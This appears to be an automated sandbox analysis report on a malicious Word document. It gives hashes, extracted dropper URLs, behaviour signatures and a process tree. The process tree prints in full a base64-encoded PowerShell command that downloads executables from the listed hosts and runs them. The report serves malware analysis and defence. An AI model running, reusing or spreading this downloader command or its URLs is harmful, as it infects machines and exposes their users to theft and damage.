Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13/09/2024, 09:38

General

  • Target

    de26972bb293b28eb74ade9cd1c750f8_JaffaCakes118.doc

  • Size

    144KB

  • MD5

    de26972bb293b28eb74ade9cd1c750f8

  • SHA1

    32f0665970eee3b2b712a9e13cd86a5701879324

  • SHA256

    a4c72f0d5e93dff6abe76ec873aecf3c626c1086d23f1316338c4d4a45eb4aee

  • SHA512

    df5b17256b41e70b9d0288833d990db77bd33dc66d4395304044dc2d140a6a53a8e4cddd49ae5392fa614b09b28a5d6c1d27b370001342672c698e2cb4c4d5fc

  • SSDEEP

    1536:IBpHfa3BkRD3bNqfNpu39IId5a6XP3Mg8afmqHMxXOYgnJnIJe4SGOMKaK4/T:0R1qf69xak3MgxmuY0nae4sMKT6T

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://ibccglobal.com/thankyou2/ARA/

exe.dropper

http://work.digitalvichar.com/1mv7clu/o/

exe.dropper

http://13.229.25.57/7xdfb/jpA/

exe.dropper

http://binarystationary.com/cgi-bin/5rM/

exe.dropper

http://fmcav.com/images/ZQF/

exe.dropper

https://kodiakheating.com/ldnha/ybI/

exe.dropper

https://khvs.vrfantasy.gallery/igiodbck/eXq/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\de26972bb293b28eb74ade9cd1c750f8_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1860
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABTAGMAaAA0AHoAagAyAD0AKAAnAFoAXwAnACsAKAAnAHoAcgAnACsAJwBqADMAYQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAUgBQAFIATwBmAGkAbABlAFwASQBjADQARQBHAFYAdQBcAEMAXwB6AFMAawA1AFgAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIAZQBjAHQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGMAVQBgAFIAYABJAFQAeQBgAHAAUgBvAFQATwBDAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwArACcAMgAsACAAdAAnACkAKwAoACcAbAAnACsAJwBzADEAJwApACsAKAAnADEALAAgACcAKwAnAHQAbAAnACkAKwAnAHMAJwApADsAJABJAHgAOAB4AHAAbgBxACAAPQAgACgAJwBCAHAAJwArACcANgAnACsAKAAnAHAANAB4ACcAKwAnAHAAawAnACkAKQA7ACQAUAA4AHAAcAB5AGYAdAA9ACgAKAAnAFIAOAAnACsAJwBuAGcAJwApACsAJwB5ACcAKwAnADYAZAAnACkAOwAkAFcAZgBvAF8AbwBkAGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0ASQAnACsAJwBjADQAZQBnAHYAdQB7ADAAfQAnACsAJwBDAF8AegBzAGsANQB4AHsAJwArACcAMAB9ACcAKQAgAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABJAHgAOAB4AHAAbgBxACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABCAGYAaAA3AGQAdQBtAD0AKAAoACcARAAnACsAJwBxADcAJwApACsAKAAnADAAaAAnACsAJwBwAGMAJwApACkAOwAkAFUAcgB5AGIAMABkAGkAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQBUAC4AVwBFAEIAQwBMAGkAZQBuAHQAOwAkAFcAZQBwAGIAZABmAG8APQAoACgAJwBoACcAKwAnAHQAJwArACcAdABwADoALwAnACkAKwAoACcALwBpACcAKwAnAGIAJwApACsAKAAnAGMAYwBnAGwAbwBiACcAKwAnAGEAJwArACcAbAAuACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbQAvAHQAaABhAG4AawB5AG8AJwArACcAdQAyAC8AQQBSACcAKQArACcAQQAvACcAKwAoACcAKgAnACsAJwBoAHQAdAAnACsAJwBwADoALwAvACcAKQArACgAJwB3AG8AJwArACcAcgAnACkAKwAoACcAawAuAGQAJwArACcAaQBnACcAKQArACgAJwBpAHQAJwArACcAYQAnACsAJwBsAHYAaQBjAGgAYQByACcAKQArACgAJwAuAGMAJwArACcAbwBtAC8AMQBtAHYAJwApACsAKAAnADcAYwBsAHUAJwArACcALwAnACkAKwAoACcAbwAvACoAaAB0AHQAcAA6ACcAKwAnAC8ALwAnACsAJwAxADMAJwArACcALgAyACcAKwAnADIAJwApACsAKAAnADkAJwArACcALgAyACcAKwAnADUALgA1ADcALwA3AHgAZABmAGIALwBqACcAKwAnAHAAQQAvACcAKwAnACoAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAOgAvACcAKwAnAC8AYgBpACcAKwAnAG4AYQByAHkAcwB0AGEAdABpAG8AJwApACsAJwBuACcAKwAnAGEAJwArACcAcgB5ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAtACcAKwAnAGIAaQBuAC8ANQAnACkAKwAoACcAcgAnACsAJwBNAC8AKgBoAHQAJwApACsAJwB0ACcAKwAnAHAAJwArACgAJwA6AC8AJwArACcALwBmACcAKQArACgAJwBtAGMAJwArACcAYQAnACkAKwAoACcAdgAuAGMAbwAnACsAJwBtAC8AaQBtAGEAZwAnACsAJwBlAHMAJwArACcALwAnACsAJwBaAFEAJwArACcARgAvACoAaAB0ACcAKwAnAHQAcAAnACkAKwAoACcAcwA6ACcAKwAnAC8ALwBrAG8AZABpAGEAawBoAGUAJwArACcAYQAnACkAKwAoACcAdABpACcAKwAnAG4AZwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGwAJwArACcAZABuACcAKQArACgAJwBoAGEAJwArACcALwAnACkAKwAoACcAeQBiACcAKwAnAEkALwAqACcAKQArACgAJwBoAHQAJwArACcAdAAnACkAKwAoACcAcAAnACsAJwBzADoALwAvACcAKwAnAGsAaAB2ACcAKQArACgAJwBzAC4AdgByAGYAYQBuACcAKwAnAHQAYQBzAHkAJwArACcALgAnACsAJwBnAGEAbAAnACkAKwAnAGwAZQAnACsAJwByAHkAJwArACgAJwAvAGkAJwArACcAZwBpACcAKQArACgAJwBvAGQAJwArACcAYgBjAGsAJwApACsAKAAnAC8AZQBYAHEAJwArACcALwAnACkAKQAuACIAcwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABYAGgAZABuAG0AbQBsAD0AKAAoACcARQByAHUAJwArACcANgB4ACcAKQArACcAbgAnACsAJwBwACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFgAcwAwAGgAcwB2ADIAIABpAG4AIAAkAFcAZQBwAGIAZABmAG8AKQB7AHQAcgB5AHsAJABVAHIAeQBiADAAZABpAC4AIgBEAG8AYABXAGAATgBsAE8AYQBEAGAARgBpAGwARQAiACgAJABYAHMAMABoAHMAdgAyACwAIAAkAFcAZgBvAF8AbwBkAGYAKQA7ACQAVQBlADIAcwBoAG8AcwA9ACgAKAAnAE8AcQBqACcAKwAnAGkAJwApACsAKAAnAGsAJwArACcAdQAzACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFcAZgBvAF8AbwBkAGYAKQAuACIATABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANQA1ADcAMQApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACgAJABXAGYAbwBfAG8AZABmACkAOwAkAFMAagBxADIAMgBfADEAPQAoACcASgAxACcAKwAoACcAdwBfAHMAJwArACcAbQAzACcAKQApADsAYgByAGUAYQBrADsAJABJAGgAZAB5AHYAcQB0AD0AKAAoACcAQgA0ACcAKwAnADgAJwApACsAKAAnAGMAJwArACcAZAB1AHgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAYQA5AGUAMAA0AGIAPQAoACcAQQB5ACcAKwAoACcANgB6ACcAKwAnADgAJwApACsAJwBiAGMAJwApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2136

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            19KB

            MD5

            ab8cd776df701dcb1715246985311308

            SHA1

            7be229ef4b911feb9e26df3fd842bb9a88f13105

            SHA256

            f7aebeb928c6215344bd550bc906c85a9a7910c4a7725f7fc8d9c3a307ddcd89

            SHA512

            77656124568dae75314abe8355e0c978b2d723766dbc96d272dce5ea13fc1074b5012d2544166b7644a5cdc1ef8be39f7072097e9ffe7de5d99639c17174684b

          • memory/2136-52-0x000000001B620000-0x000000001B902000-memory.dmp

            Filesize

            2.9MB

          • memory/2136-53-0x0000000002390000-0x0000000002398000-memory.dmp

            Filesize

            32KB

          • memory/2532-36-0x0000000005B50000-0x0000000005C50000-memory.dmp

            Filesize

            1024KB

          • memory/2532-2-0x0000000070D4D000-0x0000000070D58000-memory.dmp

            Filesize

            44KB

          • memory/2532-28-0x0000000005B50000-0x0000000005C50000-memory.dmp

            Filesize

            1024KB

          • memory/2532-27-0x0000000005B50000-0x0000000005C50000-memory.dmp

            Filesize

            1024KB

          • memory/2532-26-0x0000000006570000-0x0000000006670000-memory.dmp

            Filesize

            1024KB

          • memory/2532-7-0x0000000000590000-0x0000000000690000-memory.dmp

            Filesize

            1024KB

          • memory/2532-46-0x0000000005B50000-0x0000000005C50000-memory.dmp

            Filesize

            1024KB

          • memory/2532-45-0x0000000005B50000-0x0000000005C50000-memory.dmp

            Filesize

            1024KB

          • memory/2532-44-0x0000000005B50000-0x0000000005C50000-memory.dmp

            Filesize

            1024KB

          • memory/2532-0-0x000000002FF01000-0x000000002FF02000-memory.dmp

            Filesize

            4KB

          • memory/2532-5-0x0000000000590000-0x0000000000690000-memory.dmp

            Filesize

            1024KB

          • memory/2532-6-0x0000000000590000-0x0000000000690000-memory.dmp

            Filesize

            1024KB

          • memory/2532-54-0x0000000070D4D000-0x0000000070D58000-memory.dmp

            Filesize

            44KB

          • memory/2532-55-0x0000000000590000-0x0000000000690000-memory.dmp

            Filesize

            1024KB

          • memory/2532-56-0x0000000005B50000-0x0000000005C50000-memory.dmp

            Filesize

            1024KB

          • memory/2532-57-0x0000000005B50000-0x0000000005C50000-memory.dmp

            Filesize

            1024KB

          • memory/2532-58-0x0000000005B50000-0x0000000005C50000-memory.dmp

            Filesize

            1024KB

          • memory/2532-59-0x0000000005B50000-0x0000000005C50000-memory.dmp

            Filesize

            1024KB

          • memory/2532-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2532-78-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2532-79-0x0000000070D4D000-0x0000000070D58000-memory.dmp

            Filesize

            44KB